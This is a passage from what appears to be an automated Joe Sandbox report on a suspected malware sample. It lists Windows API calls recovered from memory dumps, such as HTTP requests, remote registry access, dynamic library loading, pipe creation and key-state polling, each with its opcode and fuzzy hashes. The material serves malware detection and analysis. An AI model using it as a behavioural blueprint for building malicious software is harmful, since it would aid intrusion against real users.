                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharLower_memmove
                                                                            • String ID: cdecl$none$stdcall$winapi
                                                                            • API String ID: 3425801089-567219261
                                                                            • Opcode ID: e8e4ba9c3021eca0dab3bfe5e035ba56a4a34dbe246d5de045db195f92048aef
                                                                            • Instruction ID: cea065570e3a51c900fcbaba5855c220e0ee336bb8d4523ce1cf65255da05483
                                                                            • Opcode Fuzzy Hash: e8e4ba9c3021eca0dab3bfe5e035ba56a4a34dbe246d5de045db195f92048aef
                                                                            • Instruction Fuzzy Hash: 9331AD71904219ABCF00EF58CC919EEB3B4FF05320B008A29E96AD77D6DB31E905CB91
                                                                            APIs
                                                                              • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                                              • Part of subcall function 0085AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0085AABC
                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00858F14
                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00858F27
                                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00858F57
                                                                              • Part of subcall function 00807BCC: _memmove.LIBCMT ref: 00807C06
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$_memmove$ClassName
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 365058703-1403004172
                                                                            • Opcode ID: adaf38c33d47d60b5d48c69aa54b23c0ba7301ce782b05aa4fa55c3c38c83488
                                                                            • Instruction ID: 50f35387cc0054fc3054f6ae384fe1a0fc9bd8c5cfdf904b12f5ea3e565b3bb5
                                                                            • Opcode Fuzzy Hash: adaf38c33d47d60b5d48c69aa54b23c0ba7301ce782b05aa4fa55c3c38c83488
                                                                            • Instruction Fuzzy Hash: C921F571900108BEDB14ABA89C85CFF7B69FF05320B10462AF825E72E1DE39184DDA20
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00887C4A
                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00887C58
                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00887C5F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$DestroyWindow
                                                                            • String ID: S$msctls_updown32
                                                                            • API String ID: 4014797782-968134999
                                                                            • Opcode ID: 1fe21dac0acb9558253bfd3a4bbc9a5082b5076563b6e1b448df0c648af19122
                                                                            • Instruction ID: ba65b98c1cacd69ee6ff5bd5bc16d80dfc949f5b8a951a03a47b17c6f37a0c00
                                                                            • Opcode Fuzzy Hash: 1fe21dac0acb9558253bfd3a4bbc9a5082b5076563b6e1b448df0c648af19122
                                                                            • Instruction Fuzzy Hash: 92216BB5204208AFDB10EF28DCC1DA737BDFB59364B240059FA01DB3A1CA31EC418BA0
                                                                            APIs
                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0087184C
                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00871872
                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 008718A2
                                                                            • InternetCloseHandle.WININET(00000000), ref: 008718E9
                                                                              • Part of subcall function 00872483: GetLastError.KERNEL32(?,?,00871817,00000000,00000000,00000001), ref: 00872498
                                                                              • Part of subcall function 00872483: SetEvent.KERNEL32(?,?,00871817,00000000,00000000,00000001), ref: 008724AD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                            • String ID:
                                                                            • API String ID: 3113390036-3916222277
                                                                            • Opcode ID: ad8945130f948d0563cdb6d55fd521b16de387d84124efa09ff43716500af8be
                                                                            • Instruction ID: 38483b0d4763e12168aaf396b4d6951dd107ab759738f9a7a029ce298aebbf6b
                                                                            • Opcode Fuzzy Hash: ad8945130f948d0563cdb6d55fd521b16de387d84124efa09ff43716500af8be
                                                                            • Instruction Fuzzy Hash: 4E21B0B1504208BFEB11AF68DC89EBB77EDFB48744F10813AF549D2544DA34CD0597A2
                                                                            APIs
                                                                              • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                                            • GetCursorPos.USER32(?), ref: 0088C4D2
                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0083B9AB,?,?,?,?,?), ref: 0088C4E7
                                                                            • GetCursorPos.USER32(?), ref: 0088C534
                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0083B9AB,?,?,?), ref: 0088C56E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                            • String ID: S
                                                                            • API String ID: 2864067406-2858979982
                                                                            • Opcode ID: 1a98d91392183b1f619e2abc7b84f0fbadd4f58cdea84412381b7ddc51428895
                                                                            • Instruction ID: bc47077d2176e0b453198cb0fc6076999408383a28a7a18d46b511d8f72f335e
                                                                            • Opcode Fuzzy Hash: 1a98d91392183b1f619e2abc7b84f0fbadd4f58cdea84412381b7ddc51428895
                                                                            • Instruction Fuzzy Hash: 41316D35600458AFCF25DF98CC98EEA7BB9FB49310F444169F905CB2A1C731AD90DBA4
                                                                            APIs
                                                                              • Part of subcall function 00801D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00801D73
                                                                              • Part of subcall function 00801D35: GetStockObject.GDI32(00000011), ref: 00801D87
                                                                              • Part of subcall function 00801D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00801D91
                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00886461
                                                                            • LoadLibraryW.KERNEL32(?), ref: 00886468
                                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0088647D
                                                                            • DestroyWindow.USER32(?), ref: 00886485
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                            • String ID: SysAnimate32
                                                                            • API String ID: 4146253029-1011021900
                                                                            • Opcode ID: b4b823ef9cd748b438a4c7849bda855c7848208ad6dd5ebcb4496cfbcf6e4af0
                                                                            • Instruction ID: 3ac708fed6a415713a9cdd1c4fa221cb579711af9785c3bd925d2656f1350863
                                                                            • Opcode Fuzzy Hash: b4b823ef9cd748b438a4c7849bda855c7848208ad6dd5ebcb4496cfbcf6e4af0
                                                                            • Instruction Fuzzy Hash: 2B218E71110205ABEF10AF68DC80EBF37A9FF58328F204629FA10D21A1E7319C619764
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00866DBC
                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00866DEF
                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00866E01
                                                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00866E3B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHandle$FilePipe
                                                                            • String ID: nul
                                                                            • API String ID: 4209266947-2873401336
                                                                            • Opcode ID: 94dfd29f09b35e894a4dc7cb8bb3c1d869fbcae2435e0fcf76ada9d6ab0ddd04
                                                                            • Instruction ID: 2833fb9d40e23afaaf3b22014785769d09f8283eda87fc764a150b5e94c2a222
                                                                            • Opcode Fuzzy Hash: 94dfd29f09b35e894a4dc7cb8bb3c1d869fbcae2435e0fcf76ada9d6ab0ddd04
                                                                            • Instruction Fuzzy Hash: 6621B674600349ABDB209F29DC05B9A77F8FF44760F214629FDA0D72D0EB719960CB50
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00866E89
                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00866EBB
                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00866ECC
                                                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00866F06
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHandle$FilePipe
                                                                            • String ID: nul
                                                                            • API String ID: 4209266947-2873401336
                                                                            • Opcode ID: a8835190517781206f27dc23790e76276e49ed938b9cce8297a159cedc4d8c55
                                                                            • Instruction ID: 9418be54c182947257eefb78b6235ca98555805a01c05937af0fa65444fdc8db
                                                                            • Opcode Fuzzy Hash: a8835190517781206f27dc23790e76276e49ed938b9cce8297a159cedc4d8c55
                                                                            • Instruction Fuzzy Hash: FC21A179500345DBDB209F69DC04A9A77A8FF45724F310B19FDA0D72D0EB71A860CB61
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0086AC54
                                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0086ACA8
                                                                            • __swprintf.LIBCMT ref: 0086ACC1
                                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,0088F910), ref: 0086ACFF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                                            • String ID: %lu
                                                                            • API String ID: 3164766367-685833217
                                                                            • Opcode ID: 4a80becf168fb27de8115228f4deba429a0c22a1e7e2e4a9bd4b5c2814effad9
                                                                            • Instruction ID: 777f97665311615b2277d19bc09ab3e7d98ec8f9522bf60b37d9847e28c600fd
                                                                            • Opcode Fuzzy Hash: 4a80becf168fb27de8115228f4deba429a0c22a1e7e2e4a9bd4b5c2814effad9
                                                                            • Instruction Fuzzy Hash: 68214474600109AFCB10DF69DD85DAE7BB8FF49714B004069F909EB352DB35EA51CB62
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?), ref: 00861B19
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                            • API String ID: 3964851224-769500911
                                                                            • Opcode ID: e7d930075cc437d57a37988295f70a7e7c44515f31da2764db2a60a819e4fd69
                                                                            • Instruction ID: be06de68fd6ee3c266272138b4f3bc89f88a26bea3efec99d45009ac772b24b3
                                                                            • Opcode Fuzzy Hash: e7d930075cc437d57a37988295f70a7e7c44515f31da2764db2a60a819e4fd69
                                                                            • Instruction Fuzzy Hash: E7115E31900119CFCF00EF98D8958EEB7B4FF25304B944465D915E7692EB325D0ACF51
                                                                            APIs
                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0087EC07
                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0087EC37
                                                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0087ED6A
                                                                            • CloseHandle.KERNEL32(?), ref: 0087EDEB
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                            • String ID:
                                                                            • API String ID: 2364364464-0
                                                                            • Opcode ID: 623b66c9d080fdf5b3ac4b78cb749a1d57dc9a881bf0d7f527c985ac869d67df
                                                                            • Instruction ID: 7f31689f197b3696fae6b9b05333e5be8ddc52028db2944542d4986c49e94b76
                                                                            • Opcode Fuzzy Hash: 623b66c9d080fdf5b3ac4b78cb749a1d57dc9a881bf0d7f527c985ac869d67df
                                                                            • Instruction Fuzzy Hash: 38812CB16047109FD760EF28CC86B2AB7E5FF48720F14896DF999DB2D2D670AC408B52
                                                                            APIs
                                                                              • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                                              • Part of subcall function 00880E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0087FDAD,?,?), ref: 00880E31
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008800FD
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0088013C
                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00880183
                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 008801AF
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 008801BC
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                            • String ID:
                                                                            • API String ID: 3440857362-0
                                                                            • Opcode ID: 6d2bfadfbea7f474ba6a2e61b206e00fd668f46bb07b385e9c7227b7cb80e62a
                                                                            • Instruction ID: 55841ba4d44fc690e49c2db5d24d2ae43504ccd4104365b3027b9d65448c49dc
                                                                            • Opcode Fuzzy Hash: 6d2bfadfbea7f474ba6a2e61b206e00fd668f46bb07b385e9c7227b7cb80e62a
                                                                            • Instruction Fuzzy Hash: E5511771208204AFD754EF58CC85E6AB7E9FF84314F40892DF596C72A2EB31E949CB52
                                                                            APIs
                                                                              • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
                                                                              • Part of subcall function 00809837: __swprintf.LIBCMT ref: 008098AC
                                                                            • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0087D927
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0087D9AA
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0087D9C6
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0087DA07
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0087DA21
                                                                              • Part of subcall function 00805A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00867896,?,?,00000000), ref: 00805A2C
                                                                              • Part of subcall function 00805A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00867896,?,?,00000000,?,?), ref: 00805A50
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 327935632-0
                                                                            • Opcode ID: 73b1e3c16569765667bf49c793963a3ff6043c0fb5ba6d2e61ac54c160cfb547
                                                                            • Instruction ID: 6b396c4f9225338fb6ece996144d1284cc5325303d656fd513ef1ae802cc0e93
                                                                            • Opcode Fuzzy Hash: 73b1e3c16569765667bf49c793963a3ff6043c0fb5ba6d2e61ac54c160cfb547
                                                                            • Instruction Fuzzy Hash: 9451F035A00219DFCB40EFA8C8859AABBB4FF09324B14C069E959EB352D731ED45CF91
                                                                            APIs
                                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0086E61F
                                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0086E648
                                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0086E687
                                                                              • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
                                                                              • Part of subcall function 00809837: __swprintf.LIBCMT ref: 008098AC
                                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0086E6AC
                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0086E6B4
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 1389676194-0
                                                                            • Opcode ID: 2210ec9c99e7f37284dfafb280c7e15cb0f1257dbb8ba61d580f716c1b2e399d
                                                                            • Instruction ID: 4eddc5fba38e0a60436b4acab752b9d1710d3c1c08dea3c6495c44b5ab6bb730
                                                                            • Opcode Fuzzy Hash: 2210ec9c99e7f37284dfafb280c7e15cb0f1257dbb8ba61d580f716c1b2e399d
                                                                            • Instruction Fuzzy Hash: 1D51F879A00105DFCB41EF68C981AAABBF5FF09314B1480A5E949EB3A2CB31ED51DB51
                                                                            APIs
                                                                            • GetCursorPos.USER32(?), ref: 00802357
                                                                            • ScreenToClient.USER32(008C57B0,?), ref: 00802374
                                                                            • GetAsyncKeyState.USER32(00000001), ref: 00802399
                                                                            • GetAsyncKeyState.USER32(00000002), ref: 008023A7
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                            • String ID:
                                                                            • API String ID: 4210589936-0
                                                                            • Opcode ID: 73cc3837790060a4e0710440021cb762d1e5c5d6c0dfbbf792a4aedff1682546
                                                                            • Instruction ID: 73de9ef1542b966db812c3bba64699f751bd61463b829c093523fc1575b75de1
                                                                            • Opcode Fuzzy Hash: 73cc3837790060a4e0710440021cb762d1e5c5d6c0dfbbf792a4aedff1682546
                                                                            • Instruction Fuzzy Hash: E8418E75604119FBCF199F68CC48AE9BB74FB45364F20431AF828E22E1CB74A950DF91
                                                                            APIs
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008563E7
                                                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 00856433
                                                                            • TranslateMessage.USER32(?), ref: 0085645C
                                                                            • DispatchMessageW.USER32(?), ref: 00856466
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00856475
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
